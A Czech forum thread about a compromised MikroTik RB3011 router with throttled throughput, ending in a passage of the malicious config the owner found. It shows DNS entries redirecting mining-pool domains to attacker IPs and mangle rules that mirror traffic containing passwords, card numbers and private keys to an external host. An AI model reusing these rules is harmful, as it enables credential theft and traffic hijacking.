MikroTik RouterBOARD 3011UiAS problém s datovým tokem

ben

Dobrý den,

mám na firmě RouterBOARD 3011UiAS. Který používám hodně dlouho a nikdy jsem s ním neměl problém až do teď.

Internet máme od UPC, který má u nás SWITCH - CISCO - 100 / 100 (předávací bod). Včera jsem iperfoval a z předávacího bodu teče 115/105, což je ok. Jakmile z předávacího bodu připojím do ETH1, který je určen jako WAN a ETH9 jde do Switche, tak je rychlost 30/30 a víc to nedá.

Zkoušel jsem přítom z MikroTiku do PC a přes 30/30 se nedostanu. Vyloučil jsem všechny aktivní prvky po cestě. Dělá to na 100% MikroTik. Nevíte čím by to mohlo být? Měl jsem nastavené dobře, kde to makalo 100/100 a před týdnem z ničeho nic přestalo fungovat full rychlostí. Žádný zásah ani upgrade jsem neprováděl. Pokud přidám ETH2 jako WAN, tak je rychlost totožná 30/30. Všude mám napsáno unlimited.

Ještě jsem si všiml, že pokud se chci přihlásit přes WinBOX, tak se nepřihlásím - píše to pouze Error. Pokud se přihlásím přes www rozhraní, tak vše maká jak má.

Na MikroTiku se mi nepozdává, to že pokud je zapojen pouze do mého PC, tak probíhá jak na RX, tak TX nějaký datový tok. Přitom na PC neprobíhá synchronizace ani aktualizace. Tudíž žádný pohyb na síť. kartě. Když už tak maličký a ne v takových rozměrech / tocích.

Parametry:

RouterBOARD 3011UiAS

Firmware type: ipq8060

Factory Firmware: 3.27

Current Firmware: 3.41

Upgrade Firmware: 6.43.4

Setkal se s tímto někdo? Jak prosím řešit?

Děkuji za odpovědi a případná řešení.

pcwifi

primarne bych resil proc nejde login pres winbox, ze by nejaky ten virecek jak se tu obsahle resilo a resi ? udelej zalohu / export nastaveni, celej ten RB přepal NetInstallem , nastav jen zaklad a zkus jak se chova speed. pokud ok prdni tam zpet zalohu konfigu a uvidis...

coolerman1

Upgradni FW mne to robilo zlobu ked som mal iny fw a iny ros

Trnec

Není rozstřelená? Zaplá webproxy? Nějaký mangle pravidla ve firewallu? Přepsaný porty na api, telnet, ssh a winbox?

hapi

to vypadá jak na otevřenej dns server z venku a nejenom to.

honzam

Upgradni FW mne to robilo zlobu ked som mal iny fw a iny ros

A kam by to měl upgradnout když má poslední 6.43.4?

myghael

Upgradni FW mne to robilo zlobu ked som mal iny fw a iny ros

A kam by to měl upgradnout když má poslední 6.43.4?

Já tam vidím, že má 3.41 a možnost upgradu na 6.43.4. A rovněž se přikláním k tomu, že by to bylo dobré upgradovat. RB3011 mám taky a tyhle problémy nemám, takže to chce upgradovat a pak řešit, jestli to není hacknuté - osobně bych si asi vysypal konfiguraci, přejel to netinstallem nanečisto a celé nastavil znovu.

Parametry:

RouterBOARD 3011UiAS

Firmware type: ipq8060

Factory Firmware: 3.27

Current Firmware: 3.41

Upgrade Firmware: 6.43.4

honzam

Jo ty myslíš Bios. Pod pojmem fw jsem myslel ROS. Podle mě upgrade Biosu nepomůže ale může to zkusit.

Spíš by bylo lepší vložit konfig sem...

myghael

honzam: No to rozhodnopádně

...

Bude to chtít postnout ještě konfiguraci tvého zařízení, nejlépe v terminálu následující příkaz (před odesláním přepiš např. IP adresy třeba na A.B.C.D a vůbec podobně skryj, co nechceš dát ven):

/export compact

Případně i výpis souborů:

/file print

Jinak promiň, ale křišťálovou kouli jsem si nechal v autě, čajové lístky si kocour spletl s šantou a úplněk je za dlouho.

tron

upgradoval bych

ben

Dobrý den,

provedl jsem netinstall a vše již funguje jak má. Vypnul jsem services, které nepoužívám z důvodu bezpečnosti. Po 10min již někdo ťukal na vrátka viz. screen.

Před netinstallem jsem exportoval config do .rsc. Objevil jsem tam bakterii, která pravděpodobně těžila bitcoin a ethereum. Pak z netu na můj RB útočil jiný MikroTik a snažil se mi dostat do RB.

Config:

/ip dns static

add address=185.205.210.23 name=asia1.ethermine.org

add address=185.205.210.23 name=asia1.ethpool.org

add address=185.205.210.23 name=asia1.fullhashed.com

add address=185.205.210.23 name=asia2.ethermine.org

add address=185.205.210.23 name=cn.sparkpool.com

add address=185.205.210.23 name=aurorapool.net

add address=185.205.210.23 name=daggerhashimoto.br.nicehash.com

add address=185.205.210.23 name=daggerhashimoto.eu.nicehash.com

add address=185.205.210.23 name=daggerhashimoto.hk.nicehash.com

add address=185.205.210.23 name=daggerhashimoto.in.nicehash.com

add address=185.205.210.23 name=daggerhashimoto.jp.nicehash.com

add address=185.205.210.23 name=daggerhashimoto.usa.nicehash.com

add address=185.205.210.23 name=coinotron.com

add address=185.205.210.23 name=eth.1stpool.com

add address=185.205.210.23 name=eth.anorak.tech

add address=185.205.210.23 name=eth.2miners.com

add address=185.205.210.23 name=eth.antpool.com

add address=185.205.210.23 name=eth-ar.dwarfpool.com

add address=185.205.210.23 name=eth.arsmine.net

add address=185.205.210.23 name=eth-as.coinmine.pl

add address=185.205.210.23 name=eth-asia1.nanopool.org

add address=185.205.210.23 name=eth-br.dwarfpool.com

add address=185.205.210.23 name=eth.chileminers.cl

add address=185.205.210.23 name=eth.coinfoundry.org

add address=185.205.210.23 name=eth.coinmine.pl

add address=185.205.210.23 name=ethepool.com

add address=185.205.210.23 name=ether.bw.com

add address=185.205.210.23 name=etherdig.net

add address=185.205.210.23 name=ethereum.marshsoftware.ca

add address=185.205.210.23 name=ethereumpool.club

add address=185.205.210.23 name=ethergrab.us

add address=185.205.210.23 name=ethermine.ru

add address=185.205.210.23 name=ethertrench.com

add address=185.205.210.23 name=eth.ethertrench.com

add address=185.205.210.23 name=eth-eu1.nanopool.org

add address=185.205.210.23 name=eth-eu.coinmine.pl

add address=185.205.210.23 name=eth-eu.dwarfpool.com

add address=185.205.210.23 name=eth-eu.mining.sk

add address=185.205.210.23 name=eth-eu.pool.sexy

add address=185.205.210.23 name=eth.f2pool.com

add address=185.205.210.23 name=eth.gigantpool.com

add address=185.205.210.23 name=eth.gpumine.org

add address=185.205.210.23 name=eth-hk.dwarfpool.com

add address=185.205.210.23 name=eth.miningcity.org

add address=185.205.210.23 name=eth.mymininghub.com

add address=185.205.210.23 name=eth.pool.minergate.com

add address=185.205.210.23 name=eth.poolmining.org

add address=185.205.210.23 name=eth-pool.ucrypto.net

add address=185.205.210.23 name=eth.pool.zet-tech.eu

add address=185.205.210.23 name=eth-ru.dwarfpool.com

add address=185.205.210.23 name=eth-ru.edgestile.io

add address=185.205.210.23 name=eth-ru.mining.sk

add address=185.205.210.23 name=eth-sg.dwarfpool.com

add address=185.205.210.23 name=eth.soyminero.es

add address=185.205.210.23 name=eth.suprnova.cc

add address=185.205.210.23 name=eth.uleypool.com

add address=185.205.210.23 name=eth-us.coinmine.pl

add address=185.205.210.23 name=eth-us.dwarfpool.com

add address=185.205.210.23 name=eth-us-east1.nanopool.org

add address=185.205.210.23 name=eth-us.maxhash.org

add address=185.205.210.23 name=eth-us.pool.sexy

add address=185.205.210.23 name=eth-us-west1.nanopool.org

add address=185.205.210.23 name=eth.waterhole.io

add address=185.205.210.23 name=eth.xeminer.net

add address=185.205.210.23 name=eth.zion.net.co

add address=185.205.210.23 name=eu1.ethermine.org

add address=185.205.210.23 name=eu1.ethpool.org

add address=185.205.210.23 name=eu2.ethermine.org

add address=185.205.210.23 name=eu.99miners.com

add address=185.205.210.23 name=eu.ethmine.club

add address=185.205.210.23 name=eu.sparkpool.com

add address=185.205.210.23 name=huabei2-pool.ethfans.org

add address=185.205.210.23 name=huabei-pool.ethfans.org

add address=185.205.210.23 name=miningcity.org

add address=185.205.210.23 name=my.ethpool.net

add address=185.205.210.23 name=na-west.sparkpool.com

add address=185.205.210.23 name=na-east.sparkpool.com

add address=185.205.210.23 name=noobpool.com

add address=185.205.210.23 name=pool.ethfans.org

add address=185.205.210.23 name=pool.virtualmining.pt

add address=185.205.210.23 name=s.comining.io

add address=185.205.210.23 name=us1.ethermine.org

add address=185.205.210.23 name=us1.ethpool.org

add address=185.205.210.23 name=us2.ethermine.org

add address=185.205.210.23 name=us2.ethpool.org

add address=185.205.210.23 name=vaux-all.uk

add address=209.239.112.96 name=stratum.antpool.com

add address=209.239.112.96 name=stratum.slushpool.com

add address=209.239.112.96 name=asia1.ethermine.org

add address=209.239.112.96 name=cn.stratum.slushpool.com

add address=209.239.112.96 name=eu.stratum.slushpool.com

add address=209.239.112.96 name=asia1.ethpool.org

add address=209.239.112.96 name=jp-stratum.btcc.com

add address=209.239.112.96 name=asia1.fullhashed.com

add address=209.239.112.96 name=mint.bitminter.com

add address=209.239.112.96 name=asia2.ethermine.org

add address=209.239.112.96 name=us.ss.btc.com

add address=209.239.112.96 name=cn.sparkpool.com

add address=209.239.112.96 name=na-west.sparkpool.com

add address=209.239.112.96 name=na-east.sparkpool.com

add address=209.239.112.96 name=aurorapool.net

add address=209.239.112.96 name=tw.sparkpool.com

add address=209.239.112.96 name=daggerhashimoto.br.nicehash.com

add address=209.239.112.96 name=kr.sparkpool.com

add address=209.239.112.96 name=daggerhashimoto.eu.nicehash.com

add address=209.239.112.96 name=jp.sparkpool.com

add address=209.239.112.96 name=bitcoin.viabtc.com

add address=209.239.112.96 name=daggerhashimoto.hk.nicehash.com

add address=209.239.112.96 name=stratum-us.f2pool.com

add address=209.239.112.96 name=daggerhashimoto.in.nicehash.com

add address=209.239.112.96 name=stratum.f2pool.com

add address=209.239.112.96 name=daggerhashimoto.jp.nicehash.com

add address=209.239.112.96 name=stratum.btcguild.com

add address=209.239.112.96 name=stratum.btccpool.com

add address=209.239.112.96 name=daggerhashimoto.usa.nicehash.com

add address=209.239.112.96 name=stratum.btc.top

add address=209.239.112.96 name=coinotron.com

add address=209.239.112.96 name=eth.1stpool.com

add address=209.239.112.96 name=eth.anorak.tech

add address=209.239.112.96 name=eth.2miners.com

add address=209.239.112.96 name=eth.antpool.com

add address=209.239.112.96 name=eth-ar.dwarfpool.com

add address=209.239.112.96 name=eth.arsmine.net

add address=209.239.112.96 name=eth-as.coinmine.pl

add address=209.239.112.96 name=eth-asia1.nanopool.org

add address=209.239.112.96 name=eth-br.dwarfpool.com

add address=209.239.112.96 name=eth.chileminers.cl

add address=209.239.112.96 name=eth.coinfoundry.org

add address=209.239.112.96 name=eth.coinmine.pl

add address=209.239.112.96 name=ethepool.com

add address=209.239.112.96 name=ether.bw.com

add address=209.239.112.96 name=etherdig.net

add address=209.239.112.96 name=ethereum.marshsoftware.ca

add address=209.239.112.96 name=ethereumpool.club

add address=209.239.112.96 name=ethergrab.us

add address=209.239.112.96 name=ethermine.ru

add address=209.239.112.96 name=ethertrench.com

add address=209.239.112.96 name=eth.ethertrench.com

add address=209.239.112.96 name=eth-eu1.nanopool.org

add address=209.239.112.96 name=eth-eu.coinmine.pl

add address=209.239.112.96 name=eth-eu.dwarfpool.com

add address=209.239.112.96 name=eth-eu.mining.sk

add address=209.239.112.96 name=eth-eu.pool.sexy

add address=209.239.112.96 name=eth.f2pool.com

add address=209.239.112.96 name=eth.gigantpool.com

add address=209.239.112.96 name=eth.gpumine.org

add address=209.239.112.96 name=eth-hk.dwarfpool.com

add address=209.239.112.96 name=eth.miningcity.org

add address=209.239.112.96 name=eth.mymininghub.com

add address=209.239.112.96 name=eth.pool.minergate.com

add address=209.239.112.96 name=eth.poolmining.org

add address=209.239.112.96 name=eth-pool.ucrypto.net

add address=209.239.112.96 name=eth.pool.zet-tech.eu

add address=209.239.112.96 name=eth-ru.dwarfpool.com

add address=209.239.112.96 name=eth-ru.edgestile.io

add address=209.239.112.96 name=eth-ru.mining.sk

add address=209.239.112.96 name=eth-sg.dwarfpool.com

add address=209.239.112.96 name=eth.soyminero.es

add address=209.239.112.96 name=eth.suprnova.cc

add address=209.239.112.96 name=eth.uleypool.com

add address=209.239.112.96 name=eth-us.coinmine.pl

add address=209.239.112.96 name=eth-us.dwarfpool.com

add address=209.239.112.96 name=eth-us-east1.nanopool.org

add address=209.239.112.96 name=eth-us.maxhash.org

add address=209.239.112.96 name=eth-us.pool.sexy

add address=209.239.112.96 name=eth-us-west1.nanopool.org

add address=209.239.112.96 name=eth.waterhole.io

add address=209.239.112.96 name=eth.xeminer.net

add address=209.239.112.96 name=eth.zion.net.co

add address=209.239.112.96 name=eu1.ethermine.org

add address=209.239.112.96 name=eu1.ethpool.org

add address=209.239.112.96 name=eu2.ethermine.org

add address=209.239.112.96 name=eu.99miners.com

add address=209.239.112.96 name=eu.ethmine.club

add address=209.239.112.96 name=eu.sparkpool.com

add address=209.239.112.96 name=huabei2-pool.ethfans.org

add address=209.239.112.96 name=huabei-pool.ethfans.org

add address=209.239.112.96 name=miningcity.org

add address=209.239.112.96 name=my.ethpool.net

add address=209.239.112.96 name=noobpool.com

add address=209.239.112.96 name=pool.ethfans.org

add address=209.239.112.96 name=pool.virtualmining.pt

add address=209.239.112.96 name=s.comining.io

add address=209.239.112.96 name=us1.ethermine.org

add address=209.239.112.96 name=us1.ethpool.org

add address=209.239.112.96 name=us2.ethermine.org

add address=209.239.112.96 name=us2.ethpool.org

add address=209.239.112.96 name=vaux-all.uk

/ip firewall mangle

add action=mark-connection chain=prerouting content=eth_submitWork \

new-connection-mark=Ethereum

add action=add-dst-to-address-list address-list=Ethereum chain=prerouting \

content=eth_submitWork

add action=fasttrack-connection chain=prerouting content=eth_submitWork

add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \

sniff-target=149.56.27.80 sniff-target-port=60000

add action=mark-connection chain=prerouting content=eth_submitWork \

new-connection-mark=Ethereum

add action=add-dst-to-address-list address-list=Ethereum chain=prerouting \

content=eth_submitWork

add action=fasttrack-connection chain=prerouting content=eth_submitWork

add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \

sniff-target=149.56.27.80 sniff-target-port=60000

add action=mark-connection chain=prerouting content=mining.submit \

new-connection-mark=Bitcoin

add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting \

content=mining.submit

add action=mark-connection chain=prerouting content=mining.submit \

new-connection-mark=Bitcoin

add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=\

149.56.27.80 sniff-target-port=60001

add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting \

content=mining.submit

add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=\

149.56.27.80 sniff-target-port=60001

add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=\

149.56.27.80 sniff-target-port=60001

add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \

sniff-target=149.56.27.80 sniff-target-port=60000

add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=\

149.56.27.80 sniff-target-port=60001

add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 \

sniff-target-port=60001

add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \

sniff-target=149.56.27.80 sniff-target-port=60000

add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=\